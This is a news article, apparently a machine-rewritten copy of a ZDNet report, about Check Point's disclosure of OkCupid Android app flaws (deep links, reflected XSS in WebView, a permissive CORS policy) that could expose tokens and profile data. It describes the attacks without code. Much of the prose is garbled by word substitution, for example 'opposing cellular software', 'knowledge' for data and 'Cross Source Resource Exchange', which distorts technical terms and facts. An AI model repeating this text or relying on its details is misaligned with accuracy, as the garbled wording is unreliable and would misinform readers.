Researchers exploring OkCupid for security vulnerabilities have discovered that hackers can loot sensitive user data.
OkCupid has received more than 50 million registered users since its launch. As one of the ultimate dating features, along with rivals like Tinder, Plenty of Fish, eHarmony, Match and Grindr, the online dating platform is used to organize around 50,000 appointments a week.
At a time when the new coronavirus pandemic and social estrangement measures make it more difficult to meet new people in a bar or other public space, many of us have turned to online dating and virtual dating as an alternative.
See also: Threesome app exposes user data, london to the White House
Dating apps that have noticed an increase in the number of users or requests for new features, such as video chats, have started to replace the way their platforms work, and OkCupid is no exception. The dating platform has noticed a 20% increase in international talks and a 10% increase in matches since the start of COVID-19 closures.
However, with a developing user base, there is an additional threat to non-public knowledge when security is up to the task.
On Wednesday, Check Point Research revealed a set of vulnerabilities in OkCupid that can result in exposing sensitive profile knowledge in the OkCupid app, hijacking user accounts to perform moves without your permission, and stealing user authentication tokens. Identifiers. and email addresses.
The app is OkCupid on Android, edition 40.3.1 on Android 6.0.1 which fits the verification theme.
Cybersecurity researchers activated the engineering of opposing cellular software and discovered the “deep link” feature, which meant it was imaginable that the attackers sent traditional malicious links to open the cellular app.
Cross-Site Scripting (XSS) mirrored attack vectors were also discovered due to coding issues in the application’s user configuration functionality, paving the way for javaScript code implementation.
CNET: Face mask counteracts even facial popularity algorithms, says examine
Together, an attacker can send an HTTP GET question and an XSS payload from their own server, which JavaScript can run by WebView.
If a victim clicks on a specially designed link – potentially sent personally through the app or posted in a public forum – PII, profile data, user features – such as those sent when creating profiles – preferences, email addresses, identifiers and authentication tokens can be compromised and exfiltrated to the attacker’s command and server (C2).
Because vulnerabilities can only be used to use loan identifiers and tokens, this can also cause attackers to make moves on your behalf, such as sending messages. However, you cannot imagine a full account recovery due to existing cookie protections.
Check Point also discovered a poorly configured CORS (Cross Source Resource Exchange) strategy on the Api server. OkCupid.com, allowing any source to send queries to the server and read the responses. Other attacks can cause the user’s knowledge to be filtered into the profile API endpoint.
TechRepublic: Which staff is your biggest protection nightmare? Maybe it’s not the other people you’re waiting for.
While the theft of data sent to a dating app may not seem as serious, the large amount of non-public knowledge collected in all likelihood through attackers can also be used in social engineering attempts, with far more damaging consequences.
“The app and platform were created to bring other people together, but of course, where other people go, the criminals will follow them, to make simple decisions,” the researchers said.
Check Point Research has informed OkCupid of its findings and security issues have already been resolved.
“No single user was affected by the potential okCupid vulnerability, and we were able to fix it in 48 hours,” the company said. “We are grateful to partners like Checkpoint who, along with OkCupid, prioritize the protection and privacy of our users.”
Similarly, in May, MobiFriends at the center of a knowledge breach in which non-public data from 3.6 million users was compromised and uploaded. The knowledge sale also included poorly encrypted passwords.
ZDNet has contacted OkCupid with more queries and will be updated when we have a response.
Do you have any advice? Contact WhatsApp Signal securely at ‘447713025499, or more to Keybase: charlie0
Oracle throws hat into ring over acquisition of TikTok operations in US: report
Ritz London suspected knowledge violation, scammers pose as credit card knowledge scam
Controversial facial popularity generation company Clearview AI signs agreements with ICE
U.S. regulators agree with CenturyLink to breach competition
By registering, you agree to the terms of use and knowledge practices defined in the privacy policy.
You’ll get a loose subscription to ZDNet’s Tech Update Today and ZDNet Announcement newsletters. You may opt out of receiving these newsletters at any time.
You agree to get CBS circle updates, alerts and promotions from business family members by adding ZDNet Tech Update Today and ZDNet Announcement. You can choose to leave at any time.